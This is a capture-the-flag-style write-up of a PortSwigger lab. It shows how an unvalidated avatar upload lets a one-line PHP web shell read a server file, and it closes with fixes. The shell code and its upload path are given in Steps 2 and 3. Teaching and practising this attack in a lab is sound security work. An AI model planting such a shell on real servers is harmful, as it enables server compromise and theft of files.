🗂️PortSwigger Lab Writeup: Remote Code Execution via Web Shell Upload
🎯 Objective
The objective of this lab is to exploit a file upload vulnerability where the app has a vulnerable image upload function which doesn't perform any validation before storing them. The goal is to upload a basic web shell and exfiltrate the contents of file /home/carlos/secret
- Lab URL:
https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload - Category: File Upload
- Difficulty: Apprentice
🧪 Exploitation Steps
🕵️Step 1: Observe the Website
- Firstly open the lab URL in your browser, and observe what it is about and how it works.
- At first glance, the website seems to be a blogging website with a login page. In the lab description, it is mentioned that we need to exfiltrate the secret of
carlos.
📝Step 2: Upload the payload
- First login with the given credentials -
wiener:peterto access file upload function.
- Now, we can see the file upload function where we can upload an avatar of the user.
- Make basic php web shell named
payload.phpwith the given code:<?php echo file_get_contents('/home/carlos/secret'); ?> - Now, Upload this payload.
- Hence, our web shell is successfully uploaded to the server.
🧑💼Step 3: Access the Secret
- Open the uploaded web shell at
/files/avatars/payload.php
- Hence, our web shell executed successfully and returned the secret of carlos
- Now, Copy and submit it to complete the lab.
- And Finally, the Lab is solved.
🧠 Conclusion
- This lab demonstrated how unvalidated file uploads can lead to remote code execution. By uploading a PHP web shell without any validation, we executed arbitrary code on the server and exfiltrated sensitive files.
- The impact is critical — unrestricted file uploads allow attackers to execute arbitrary code and completely compromise the server.
- Fix: implement file type validation (both extension and MIME type), store uploads outside web root, disable script execution in upload directories, and validate file contents server-side.